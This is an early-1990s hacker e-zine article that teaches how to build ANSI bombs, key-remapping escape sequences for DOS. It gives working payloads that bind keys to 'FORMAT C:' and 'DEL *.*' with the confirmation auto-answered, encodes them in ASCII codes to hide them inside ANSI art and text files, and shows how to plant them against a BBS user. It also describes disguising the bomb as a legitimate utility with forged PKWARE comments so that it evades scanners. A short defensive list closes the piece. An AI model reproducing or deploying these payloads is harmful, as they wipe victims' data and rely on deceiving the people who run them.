DnA 4-4: Fun with ANSI Bombs
Properly Constructing the AnsiBomd........By Vandal
First off if the intended victim does not have ANSI.SYS or has PKSFANSI.COM this will not werk!!!!
Ok..first off an ansi bomb is a set ov commands that re-define the keys on your keyboard to issue commands. For Example you could redefine the "A" to issue the command Edit. Or you could re-define the "W" Key as FORMAT C:. thats where the key redefination becomes a Bomb hehehehe...The first way to make an ansi bomb is to make it into a batch file. this is simple the easiest way is to use the "PROMPT" command from Dos.
[Example] (from Dos)
copy con ansibomb.bat
prompt $E[A;13 "ECHO Y |FORMAT C:>NUL";13p
^Z
now you have a BAT phile that when the A key is hit the system does the following
RETURN
FORMAT C:
RETURN
The "ECHO Y" means that the command for WARNING!!
ALL DATA ON THIS DRIVE WILL BE LOST!!!
CONTINUE (Y/N)
will automatically be answered with a "Y"
pretty sneaky huh, but a BAT file called ANSIBOMB.BAT is not exactly something that any person with half a clue is going to run without checking out. So heres where you will need some useful utilities the list goes as follows
- A CHART OV ASCII KEY CODES
- THE DRAW ANSI CREATOR (or it's equivalent if you want to work with pictures)
There are more utilities but for now that is all that is necessary. Now take an ansi picture that have lying around load it up with the draw and go to the bottom ov the picture. type the following
ESC [13;13;101;99;104;111;32;121;32;124;32;100;101;108;32;42;46;42;32;62;32;110;117;108'13p (not this would normally all be on one line)
the ASCII Key chart is used to werk with numbers insted ov letters so that the intended victim does not spot the werds so instead ov RETURN you have 13
this will not be seen when the picture is viewed. But when the "A" key is typed the above line will do the following
RETURN
ECHO Y|DEL *.*>NUL
RETURN
pretty dangerous huh!!! By simply Viewing the the phile with the ansi bomb the keys may be redifined!!
Now heres where we get sneaky....Most term programs come with their own ansi Drivers that will not allowed keys to be redefined. Here is a list of term programs that have their own ansi drivers
QMODEM PRO
PROCOMM PLUS
TELIX
BIT COM
there are others but if you are not sure if YOUR system comes with one I would highly recommend putting PKSFANSI.COM into your AUTOEXEC.BAT If it does not have it's own ANSi Driver then your keys may be redefined by Viewing a post or ansi on A BBS.
Now lets say you are a sysop ov a BBS and you have this same Rodent logging onto your board and you have to repeatedly delete him. Heres a way to take care ov him. Take a text file that you use for new users (if you don't have one then make one for this occasion). attach the above command to the bottom ov the text file and write a nice message one the letter like "FUCK YOU RODENT WE WANT REAL USERS TAKE A HIKE" as he views this thru the TYPE command his keys will be redefined. You can be pretty sure he won't be calling back.
FURTHER USES
OK the above data anyone with half a clue already knew so here is where it gets P/Hun
NEEDED UTILITYS
- BAT2EXEC.COM
- PKZIP (Or a program that allows comments to be added to a zip)
- NW.ZIP (The Nowhere Man Utilitys)
- THCK (Nice but not necessary)
OK make an ANSIBOMB in the form ov a batch phile. Make it real nice. One ov my favorite is to make the Bomb Titled PKSFANSI.BAT.
Next take BAT2EXEC and turn the BAT into a COM, Use the Nowhere Man Utilitys to remove the Stamp on it. And Use Either FakeFile from the Nowhere Man Utilitys or The THCK-FP to add to the size ov thee phile. Next make the DOCs, FILE-ID.DIZ and the READ.ME for it. Then Zip it all up, Use PKZIP -C to add a comment such as....
------------
This File has been distributed straight from PKWARE
if you have any problems with the software please contact us at 1-800-(add any number)
------------
It's also Good to add comments from BBS's that carry a lot ov PD warez and have been known to check all the philes before allowing them on the system.
simple huh....and with the COM phile ANSICHEK will not find the ANSi bomb these cannot be discovered by any Virus Checkers or the Such.
------------
OK there are some ansi bomb creation Devices (That I know ov) that I will tell you about now
ANSIBMBR.EXE automatically writes bomb into a TXT or BAT when you give the specific Key to Redifine and Command to Execute
ANSIMAKE.COM Excellent for Pictures werks the same way as ANSIBMBR but on ANSi pictures
ANSIBOMB.EXE For ANSi pictures again You give the Key to Re-define and it gives you the choice ov Either
- del *.* or
- format C:
PROTECTING YOURSELF
here are some ov the philes needed to protect yourself from ANSi Bombs
- PKSFANSI.COM dissables Key Redifination
- ANSICHEK.COM searches TXT's and ANS's for Bombs
- ACHKFILE.COM searches Specific Files for ANSIBOMBS and the simple solution don't use ANSI.SYS. ZANSI.SYS is excellent and doesn't allow key redefinition
TO BE CONTINUED IN DnA ISSUE 5!
Vandal-93 [DnA]
if you have any questions concerning the above material you may contact me at DnA Systems Or Digital Decay